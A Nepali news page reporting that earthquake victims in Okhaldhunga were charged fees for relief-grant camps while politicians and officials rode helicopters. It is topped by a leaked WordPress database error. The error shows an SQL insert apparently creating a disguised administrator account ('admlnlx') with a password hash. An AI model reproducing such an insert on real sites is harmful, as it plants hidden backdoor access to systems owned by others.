WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC5VLNOqhlDY.UgKI26dsyygdt1uhr1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 17:50:08', '', 'admlnlx', 'admlnlx')
ओखलढुंगा,माघ १३ –
भूकम्प पीडितसँग पैसा असुलेर विवादित बनेपछि स्थगित भएको पहिलो किस्ताको अनुदान वितरण शिविर सञ्चालन गर्न पुनः भूकम्पपीडितसँग पैसा असुलिएको छ । पीडितको पैसामा नेता र हाकिमहरु हेलिकोप्टर चढेको समाचार सार्वजनिक भएपछि स्थगित शिविर शनिबारबाट फेरि शुरु भएको छ ।
भूकम्प पीडितको अनुदान वितरण शिविरसँगै सञ्चालन गरिएको एकीकृत घुम्ती शिविरमा भूकम्प पीडितसँग निर्णय नै गरेर पाँच सयका दरले शिविर व्यवस्थापन खर्च असुलिएको हो । पलापु, फूलबारी र कालिका गाविसमा शिविर सञ्चालन गर्न एक हजारका दरले रकम असुलेर दलका, नेता, कार्यालय प्रमुख र सांसद हेलिकोप्टरमा सयर गरेका थिए ।
पीडितको पैसामा पार्टीका जिल्ला सभापति समेतलाई हेलिकोप्टरमा चढाएको चौतर्फी विरोध र आलोचना भएपछि काँग्रेस सांसद रामहरि खतिवडाले गाम्नाङटार र पोकलीको शिविरमा भने हेलिकोप्टरको इन्धन आफैले व्यहोरेका छन् । व्यवसायीसँग अनुरोध गरेर इन्धन हालेर कार्यालय प्रमुख र पैसा ओसार्न हेलिकोप्टर ल्याइएको खतिवडाले बताए ।
पीडितसँग पैसा नउठाउनकै लागि इन्धन आफुले सांसदको तलवभत्ताबाट दिएको खतिवडाको दाबी छ । तर, गाविसमा भने निर्णय नै गरेर पीडितसँग पैसा असुलिएको छ । रगनी गाविसमा प्रतिव्यक्ति पाँच सय उठाउने निर्णय नै गरेर रकम असुलिएको थियो ।
स्थानीय र भूकम्प पीडितहरुले भने पीडितसँग पैसा उठाउने र दलका नेताहरु जस लिन होडबाजी गरेर राहतम राजनीति गर्न थालेको आरोप लगाएका छन् । सांसदले हेलिकोप्टर चार्टर गर्ने पैसा कहाँबाट कमाए भन्ने प्रश्न पनि जनताले गर्न थालेका छन् । – अनलाइन खबर